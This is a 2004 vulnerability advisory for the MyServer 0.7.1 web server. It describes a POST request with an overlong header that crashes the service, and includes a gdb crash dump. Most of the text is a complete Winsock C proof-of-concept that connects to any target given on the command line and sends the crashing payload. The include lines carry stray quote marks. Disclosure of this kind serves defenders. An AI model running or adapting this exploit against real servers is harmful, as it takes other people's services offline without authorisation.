SP Research Labs Advisory x14 ----------------------------- MyServer 0.7.1 POST Denial Of Service -------------------------------------- Versions: MyServer 0.7.1 Vendor: http://www.myserverproject.net Date Released - 9.23.2004 ------------------------------------ Product Description from the vendor: MyServer is a free and easy to configure web server. MyServer is licensed under the GNU General Public License (GPL). See the license page for additional info. MyServer is in continuous development and new features will be present in future releases. Go here to see the latest news from the MyServer project. -------- Details: A specially crafted HTTP POST request, which contains 512 or more A's followed by :anything will cause the web service to stop responding. Program received signal SIGSEGV, Segmentation fault. [Switching to Thread 311316 (LWP 2527)] 0x400283cb in pthread_mutex_trylock () from /lib/i686/libpthread.so.0 (gdb) info registers eax 0x4 4 ecx 0x0 0 edx 0x19000 102400 ebx 0x19000 102400 esp 0x49cffd58 0x49cffd58 ebp 0x49cffd6c 0x49cffd6c esi 0x10 16 edi 0x4 4 eip 0x400283cb 0x400283cb eflags 0x10212 66066 cs 0x23 35 ss 0x2b 43 ds 0x2b 43 es 0x2b 43 fs 0x0 0 gs 0xa7 167 -------- Exploit: Attached to this advisory is very basic PoC code which only causes the httpd service to crash. -------------- Tested on: Mandrake 10.0 Link to advisory: http://fux0r.phathookups.com/advisory/sp-x14-advisory.txt peace out, -------------------------- badpack3t founder www.security-protocols.com -------------------------- /****************************/ PoC to crash the server /****************************/ /* MyServer 0.7.1 POST Denial Of Service vendor URL: http://www.myserverproject.net coded and discovered by: badpack3t for .:sp research labs:. www.security-protocols.com 9.20.2004 Tested on Mandrake 10.0 usage: sp-myserv-0.7.1 [targetport] (default is 80) */ #include <'winsock2.h> #include <'stdio.h> #pragma comment(lib, "ws2_32.lib") char exploit[] = "POST index.html?View=Logon HTTP/1.1 " "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" ": ihack.ms "; int main(int argc, char *argv[]) { WSADATA wsaData; WORD wVersionRequested; struct hostent *pTarget; struct sockaddr_in sock; char *target; int port,bufsize; SOCKET mysocket; if (argc < 2) { printf("MyServer 0.7.1 POST DoS by badpack3t ", argv[0]); printf("Usage: %s [targetport] (default is 80) ", argv[0]); printf("www.security-protocols.com ", argv[0]); exit(1); } wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1; target = argv[1]; port = 80; if (argc >= 3) port = atoi(argv[2]); bufsize = 1024; if (argc >= 4) bufsize = atoi(argv[3]); mysocket = socket(AF_INET, SOCK_STREAM, 0); if(mysocket==INVALID_SOCKET) { printf("Socket error! "); exit(1); } printf("Resolving Hostnames... "); if ((pTarget = gethostbyname(target)) == NULL) { printf("Resolve of %s failed ", argv[1]); exit(1); } memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); sock.sin_family = AF_INET; sock.sin_port = htons((USHORT)port); printf("Connecting... "); if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))) { printf("Couldn't connect to host. "); exit(1); } printf("Connected!... "); printf("Sending Payload... "); if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1) { printf("Error Sending the Exploit Payload "); closesocket(mysocket); exit(1); } printf("Payload has been sent! Check if the webserver is dead! "); closesocket(mysocket); WSACleanup(); return 0; }